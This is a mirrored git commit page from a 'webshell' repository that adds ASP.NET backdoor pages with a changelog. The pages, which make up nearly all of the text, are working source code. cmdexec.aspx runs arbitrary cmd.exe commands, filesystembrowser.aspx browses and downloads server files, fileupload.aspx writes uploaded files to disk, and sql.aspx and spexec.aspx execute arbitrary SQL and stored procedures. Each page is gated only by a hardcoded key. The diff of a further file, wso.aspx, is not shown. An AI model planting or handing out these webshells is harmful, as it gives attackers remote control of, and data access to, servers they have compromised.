PenTest/webshell
1
0
Fork 0
mirror of https://github.com/tennc/webshell.git synced 2026-02-16 02:16:38 +00:00
Code Issues Projects Releases Wiki Activity

add some webshell

Browse Source
This commit is contained in:
tennc
2014-05-19 09:10:17 +08:00
parent a7d2684ed0
commit 8870eb9484
24 changed files with 12299 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

52
aspx/asp.net-backdoors/ChangeLog.txt Normal file
View File

@@ -0,0 +1,52 @@
ASP.NET Backdoors
Copyright (c) 2012 woanware
Developed by Mark Woan (markwoan[at]gmail.com)
---------------------------------------------------------------------------
Change Log
----------
v1.3.0
------
- Added an auth key parameter, so that you can password protect each of the
pages. Modify the constant located at the top of each file. The
filesystembrowser.aspx file needs you to initially specify the "authkey=XXX"
parameter value
v1.2.0
------
- Added spexec.aspx allows you to dynamically load SQL Server stored
procedures and associated parameters, then execute the SP
v1.1.0
------
- Added sql.aspx which allows you to execute SQL statements
v1.0.2
------
- MikeA has kindly modified filesystembrowser.aspx and fileupload.aspx so that
if the application renames the files on upload, the functionality still
works, since I had hardcoded the filenames
v1.0.1
------
- Added extra validation to filesystembrowser.aspx to catch errors when
assigning a default drive. Thanks foob for the feedback
v1.0.0
------
- Initial Public Release
---------------------------------------------------------------------------
woanware
http://www.woanware.co.uk/

96
aspx/asp.net-backdoors/cmdexec.aspx Normal file
View File

@@ -0,0 +1,96 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>command</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
Response.Write(HEADER);
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(this.ExecuteCommand(txtCommand.Text)));
Response.Write("</pre>");
Response.Write(FOOTER);
}
/// <summary>
///
/// </summary>
/// <param name="command"></param>
/// <returns></returns>
private string ExecuteCommand(string command)
{
try
{
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = "cmd.exe";
processStartInfo.Arguments = "/c " + command;
processStartInfo.RedirectStandardOutput = true;
processStartInfo.UseShellExecute = false;
Process process = Process.Start(processStartInfo);
using (StreamReader streamReader = process.StandardOutput)
{
string ret = streamReader.ReadToEnd();
return ret;
}
}
catch (Exception ex)
{
return ex.ToString();
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>Command</title>
</head>
<body>
<form id="formCommand" runat="server">
<div>
<table>
<tr>
<td width="30">Auth Key:</td>
<td><asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox></td>
</tr>
<tr>
<td width="30">Command:</td>
<td><asp:TextBox ID="txtCommand" runat="server" Width="820px"></asp:TextBox></td>
</tr>
<td>&nbsp;</td>
<td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td>
</tr>
</table>
</div>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->

207
aspx/asp.net-backdoors/filesystembrowser.aspx Normal file
View File

@@ -0,0 +1,207 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Text" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script language="c#" runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["authkey"] == null)
{
return;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "download")
{
Response.Write(HEADER);
Response.Write(this.DownloadFile());
Response.Write(FOOTER);
}
else if (Request.Params["operation"] == "list")
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string DownloadFile()
{
try
{
if (Request.Params["file"] == null)
{
return "No file supplied";
}
string file = Request.Params["file"];
if (File.Exists(file) == false)
{
return "File does not exist";
}
Response.ClearContent();
Response.ClearHeaders();
Response.Clear();
Response.ContentType = "application/octet-stream";
Response.AddHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(file));
Response.AddHeader("Content-Length", new FileInfo(file).Length.ToString());
Response.WriteFile(file);
Response.Flush();
Response.Close();
return "File downloaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
private string OutputList()
{
try
{
StringBuilder response = new StringBuilder();
string dir = string.Empty;
if (Request.Params["directory"] == null)
{
string[] tempDrives = Environment.GetLogicalDrives();
if (tempDrives.Length > 0)
{
for (int index = 0; index < tempDrives.Length; index++)
{
try
{
dir = tempDrives[index];
break;
}
catch (IOException){}
}
}
}
else
{
dir = Request.Params["directory"];
}
if (Directory.Exists(dir) == false)
{
return "Directory does not exist";
}
// Output the auth key textbox
response.Append("<table><tr>");
response.Append(@"<td><asp:TextBox id=""txtAuthKey"" runat=""server""></asp:TextBox></td>");
response.Append("</tr><tr><td>&nbsp;<td></tr></table>");
// Output the available drives
response.Append("<table><tr>");
response.Append("<td>Drives</td>");
string[] drives = Environment.GetLogicalDrives();
foreach (string drive in drives)
{
response.Append("<td><a href=");
response.Append("?directory=");
response.Append(drive);
response.Append("&authkey=" + Request.Params["authkey"]);
response.Append("&operation=list>");
response.Append(drive);
response.Append("</a></td>");
}
// Output the current path
response.Append("</tr></table><table><tr><td>&nbsp;</td></tr>");
response.Append("<tr><td>..&nbsp;&nbsp;&nbsp;<a href=\"?directory=");
string parent = dir;
DirectoryInfo parentDirInfo = Directory.GetParent(dir);
if (parentDirInfo != null)
{
parent = parentDirInfo.FullName;
}
response.Append(parent);
response.Append("&authkey=" + Request.Params["authkey"]);
response.Append("&operation=list\">");
response.Append(parent);
response.Append("</a></td></tr></table><table>");
// Output the directories
System.IO.DirectoryInfo dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.DirectoryInfo dirs in dirInfo.GetDirectories("*.*"))
{
response.Append("<tr><td>dir&nbsp;&nbsp;<a href=\"?directory=" + dirs.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=list\">" + dirs.FullName + "</a></td></tr>");
}
// Output the files
dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.FileInfo fileInfo in dirInfo.GetFiles("*.*"))
{
response.Append("<tr><td>file&nbsp;<a href=\"?file=" + fileInfo.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=download\">" + fileInfo.FullName + "</a></td><td>");
response.Append(fileInfo.Length);
response.Append("</td></tr>");
}
response.Append("</table>");
return response.ToString();
}
catch (Exception ex)
{
return ex.ToString();
}
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->

126
aspx/asp.net-backdoors/fileupload.aspx Normal file
View File

@@ -0,0 +1,126 @@
<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["authkey"] == null)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["authkey"] != AUTHKEY)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "upload")
{
Response.Write(HEADER);
Response.Write(this.UploadFile());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string UploadFile()
{
try
{
if (Request.Params["authkey"] == null)
{
return string.Empty;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return string.Empty;
}
if (Request.Files.Count != 1)
{
return "No file selected";
}
HttpPostedFile httpPostedFile = Request.Files[0];
int fileLength = httpPostedFile.ContentLength;
byte[] buffer = new byte[fileLength];
httpPostedFile.InputStream.Read(buffer, 0, fileLength);
FileInfo fileInfo = new FileInfo(Request.PhysicalPath);
using (FileStream fileStream = new FileStream(Path.Combine(fileInfo.DirectoryName, Path.GetFileName(httpPostedFile.FileName)), FileMode.Create))
{
fileStream.Write(buffer, 0, buffer.Length);
}
return "File uploaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
/// <returns></returns>
private string GetUploadControls()
{
string temp = string.Empty;
temp = "<form enctype=\"multipart/form-data\" action=\"?operation=upload\" method=\"post\">";
temp += "<br>Auth Key: <input type=\"text\" name=\"authKey\"><br>";
temp += "<br>Please specify a file: <input type=\"file\" name=\"file\"></br>";
temp += "<div><input type=\"submit\" value=\"Send\"></div>";
temp += "</form>";
return temp;
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->

367
aspx/asp.net-backdoors/spexec.aspx Normal file
View File

@@ -0,0 +1,367 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Data"%>
<%@ Import namespace="System.Data.SqlClient"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server" language="c#">
private const string AUTHKEY = "woanware";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnLogin_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
sqlConnection.Open();
SqlCommand sqlCommand = null;
SqlDataAdapter sqlDataAdapter = null;
sqlCommand = new SqlCommand("sp_stored_procedures", sqlConnection);
sqlCommand.CommandType = CommandType.StoredProcedure;
sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
DataSet dataSet = new DataSet();
sqlDataAdapter.Fill(dataSet, "SPs");
cboSps.DataSource = dataSet.Tables["SPs"];
cboSps.DataTextField = "PROCEDURE_NAME";
cboSps.DataBind();
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
catch (Exception ex)
{
lblStatus.Text = ex.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnGetParameters_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
SqlCommand sqlCommand = new SqlCommand("sp_sproc_columns", sqlConnection);
sqlCommand.CommandType = CommandType.StoredProcedure;
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
sqlCommand.CommandType = CommandType.StoredProcedure;
sqlCommand.Parameters.Add("@procedure_name", SqlDbType.NVarChar, 390).Value = cboSps.SelectedItem.Value;
DataSet dataSet = new DataSet();
sqlDataAdapter.Fill(dataSet, "Parameters");
gridParameters.DataSource = dataSet.Tables["Parameters"];
gridParameters.DataBind();
gridResults.Visible = false;
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
DataSet dataSet = new DataSet();
SqlCommand sqlCommand = new SqlCommand(cboSps.SelectedItem.Value, sqlConnection);
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
sqlCommand.CommandType = CommandType.StoredProcedure;
this.AddParameters(sqlCommand);
sqlDataAdapter.Fill(dataSet, "Results");
this.UpdateParameters(sqlCommand);
gridResults.DataSource = dataSet.Tables["Results"];
gridResults.DataBind();
gridResults.Visible = true;
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sqlCommand"></param>
private void AddParameters(SqlCommand sqlCommand)
{
foreach (DataGridItem dataGridItem in gridParameters.Items)
{
if (((TableCell)dataGridItem.Controls[5]).Text != "5")
{
switch (((TableCell)dataGridItem.Controls[1]).Text.ToLower())
{
case "bit":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Bit).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "bigint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.BigInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "char":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Char, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "datetime":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.DateTime).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "decimal":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Decimal).Value = decimal.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "float":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Float).Value = float.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "int":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Int).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "nchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NChar).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "ntext":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NText, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "nvarchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NVarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "real":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Real).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "smallint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.SmallInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "tinyint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.TinyInt).Value = uint.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "varchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.VarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
default:
continue;
}
}
if (((TableCell)dataGridItem.Controls[5]).Text == "2")
{
sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Direction = ParameterDirection.InputOutput;
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sqlCommand"></param>
private void UpdateParameters(SqlCommand sqlCommand)
{
foreach (DataGridItem dataGridItem in gridParameters.Items)
{
if (((TableCell)dataGridItem.Controls[5]).Text != "5")
{
((TableCell)dataGridItem.Controls[7]).Text = sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Value.ToString();
}
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>Stored Procedure Execute</title>
<style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
</head>
<body>
<form id="form1" runat="server">
<table>
<tbody>
<tr>
<td>
Key:</td>
<td>
<asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Database server:</td>
<td>
<asp:TextBox id="txtDatabaseServer" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
User id:</td>
<td>
<asp:TextBox id="txtUserId" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Password:</td>
<td>
<asp:TextBox id="txtPassword" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Database:</td>
<td>
<asp:TextBox id="txtDatabase" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
</td>
<td>
<asp:Button id="btnLogin" onclick="btnLogin_Click" runat="server" Text="Login"></asp:Button>
</td>
</tr>
<tr>
<td>
Stored procedures:</td>
<td>
<asp:DropDownList id="cboSps" runat="server"></asp:DropDownList>
</td>
</tr>
<tr>
<td>
</td>
<td>
<p>
<asp:Button id="btnGetParams" onclick="btnGetParameters_Click" runat="server" Text="Get Parameters"></asp:Button>
<asp:Button id="btnExecute" onclick="btnExecute_Click" runat="server" Text="Execute Query"></asp:Button>
</p>
</td>
</tr>
<tr>
<td>
Status:</td>
<td>
<asp:Label id="lblStatus" runat="server"></asp:Label></td>
</tr>
</tbody>
</table>
<p>
<asp:DataGrid id="gridParameters" runat="server" AutoGenerateColumns="False">
<Columns>
<asp:BoundColumn DataField="column_name" HeaderText="Name"></asp:BoundColumn>
<asp:BoundColumn DataField="type_name" HeaderText="Type"></asp:BoundColumn>
<asp:BoundColumn DataField="length" HeaderText="Length"></asp:BoundColumn>
<asp:BoundColumn DataField="precision" HeaderText="Precision"></asp:BoundColumn>
<asp:BoundColumn DataField="scale" HeaderText="Scale"></asp:BoundColumn>
<asp:BoundColumn DataField="column_type" HeaderText="Column Type"></asp:BoundColumn>
<asp:TemplateColumn HeaderText="Input Value">
<ItemTemplate>
<asp:TextBox ID="TextBox1" runat="server"></asp:TextBox>
</ItemTemplate>
</asp:TemplateColumn>
<asp:BoundColumn HeaderText="Output Value"></asp:BoundColumn>
</Columns>
</asp:DataGrid>
</p>
<p>
<asp:DataGrid id="gridResults" runat="server"></asp:DataGrid>
</p>
<p>
</p>
<p>
<a href="spexec.aspx">Restart</a>
</p>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->

104
aspx/asp.net-backdoors/sql.aspx Normal file
View File

@@ -0,0 +1,104 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Data"%>
<%@ Import namespace="System.Data.SqlClient"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server" language="c#">
private const string AUTHKEY = "woanware";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = txtConnection.Text;
sqlConnection.Open();
SqlCommand sqlCommand = null;
SqlDataReader sqlDataReader = null;
sqlCommand = new SqlCommand(txtSql.Text, sqlConnection);
sqlCommand.CommandType = CommandType.Text;
sqlDataReader = sqlCommand.ExecuteReader();
StringBuilder output = new StringBuilder();
output.Append("<table width=\"100%\" border=\"1\">");
while (sqlDataReader.Read())
{
output.Append("<tr>");
int colCount = sqlDataReader.FieldCount;
for (int index = 0; index < colCount; index++)
{
output.Append("<td>");
output.Append(sqlDataReader[index].ToString());
output.Append("</td>");
}
output.Append("</tr>");
output.Append(Environment.NewLine);
}
output.Append("</table>");
Literal1.Text = output.ToString();
}
catch (SqlException sqlEx)
{
Response.Write(sqlEx.ToString());
}
catch (Exception ex)
{
Response.Write(ex.ToString());
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>SQL</title>
<style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
</head>
<body>
<form id="formSql" runat="server">
<div>
<table width="100%">
<tr><td width="30">Auth Key:</td><td><asp:TextBox ID="txtAuthKey" runat="server" Height="15px" Width="100%"></asp:TextBox></td></tr>
<tr><td>Connection:</td><td><asp:TextBox ID="txtConnection" runat="server" Height="15px" Width="100%"></asp:TextBox></td></tr>
<tr><td>SQL:</td><td><asp:TextBox ID="txtSql" runat="server" Height="258px" Width="100%"></asp:TextBox></td></tr>
<tr><td>&nbsp;</td><td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td></tr>
<tr><td colspan="2"><asp:Literal ID="Literal1" runat="server"></asp:Literal></td></tr>
</table>
</div>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->

1689
aspx/wso.aspx Normal file
View File

File diff suppressed because it is too large Load Diff